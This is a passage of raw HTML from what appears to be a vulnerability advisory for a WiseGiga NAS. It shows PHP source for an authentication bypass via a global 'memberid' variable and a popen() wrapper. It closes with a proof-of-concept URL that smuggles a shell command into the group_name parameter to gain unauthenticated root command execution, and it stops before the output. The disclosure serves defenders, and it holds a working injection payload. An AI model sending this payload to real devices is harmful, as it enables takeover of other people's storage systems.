class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">197<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-o\">&lt;&lt;&lt;<\/span><span class=\"crayon-e\">__DATA_OF_HTML__<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">198<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;JavaScript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">199<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;xc0xcexc1xf5xb9xdexc1xf6 xbexcaxc0xba xbbxe7xbfxebxc0xdaxc0xd4xb4xcfxb4xd9!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/&nbsp;&nbsp;&nbsp;&nbsp;location.href=&#8217;\/admin\/&#8217;;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">201<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;index.php&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;_parent&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">202<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">exit<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">203<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">204<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__DATA_OF_HTML__<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">205<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">206<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">207<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0034 seconds] -->  <\/p>\n<p>Using global <em>$memberid<\/em> (line 184), the attacker can override the authentication, by specifying a valid user (&#8220;root&#8221;) inside the HTTP request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980585437594646\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/webpage[&#8230;]?memberid=root&amp;[&#8230;] HTTP\/1.0<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980585437594646-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980585437594646-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webpage<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">memberid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.0<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>The pre.php files also contains a function called <em>root_exec_cmd()<\/em> that is a wrapper to <em>popen()<\/em>:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980587719805087\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 23 function root_exec_cmd($cmd)  24 {  25         $tmpfile=fopen(&#8220;\/tmp\/ramdisk\/cmd.list&#8221;,&#8221;w&#8221;);  26         fwrite($tmpfile,$cmd);  27         fclose($tmpfile);  28         popen(&#8220;\/tmp\/ramdisk\/ramush&#8221;,&#8221;r&#8221;);  29 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980587719805087-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980587719805087-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980587719805087-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-1\"><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root_exec_cmd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980587719805087-2\"><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-3\"><span class=\"crayon-cn\">25<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpfile<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">fopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/tmp\/ramdisk\/cmd.list&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980587719805087-4\"><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">fwrite<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpfile<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-5\"><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">fclose<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpfile<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980587719805087-6\"><span class=\"crayon-cn\">28<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">popen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/tmp\/ramdisk\/ramush&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;r&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-7\"><span class=\"crayon-cn\">29<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>By sending a <em>GET<\/em> request to <em>root_exec_cmd()<\/em> with user controlled <em>$cmd<\/em> variable input an attacker can execute arbitrary commands <\/p>\n<p>The WiseGiga NAS run&#8217;s the Apache server as root (uid=0 with gid=48 &#8220;apache&#8221;) hence the commands will execute as root.<\/p>\n<p><strong>Proof of Concept <\/strong><\/p>\n<p>By sending GET request to <em>\/admin\/group.php<\/em> with parameter <code>?cmd=add<\/code> the WiseGiga NAS will call the <em>add_system()<\/em> function:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98058a112146562\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 178 if($cmd == &#8220;add&#8221;)  179 {  180         add_system();  181 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058a112146562-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058a112146562-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058a112146562-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058a112146562-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d98058a112146562-1\"><span class=\"crayon-cn\">178<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;add&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058a112146562-2\"><span class=\"crayon-cn\">179<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058a112146562-3\"><span class=\"crayon-cn\">180<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">add_system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058a112146562-4\"><span class=\"crayon-cn\">181<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>The <em>add_system()<\/em> function uses global for <em>$group_name<\/em> and <em>$user_data<\/em>. <\/p>\n<p>Then it will pass the user controlled input and will run it as root:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98058d596954454\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 145 function add_system()  146 {  147         global $group_name,$user_data;  148  149     if(add_conf()==1)  150     {  151 \/\/====================================================================================  152         root_exec_cmd(&#8220;addgroup $group_name&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-1\"><span class=\"crayon-cn\">145<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">add_system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-2\"><span class=\"crayon-cn\">146<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-3\"><span class=\"crayon-cn\">147<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">group_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">user_data<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-4\"><span class=\"crayon-cn\">148<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-5\"><span class=\"crayon-cn\">149<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">add_conf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-6\"><span class=\"crayon-cn\">150<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-7\"><span class=\"crayon-cn\">151<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/====================================================================================<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-8\"><span class=\"crayon-cn\">152<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">root_exec_cmd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;addgroup $group_name&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>An attacker can get unauthenticated RCE as root by sending the following request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980590067862777\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;id%20&gt;%20\/tmp\/a<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980590067862777-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980590067862777-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;id%20&gt;%20\/tmp\/a<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>The file <em>\/tmp\/a<\/em> will contain:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980593801537199\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" 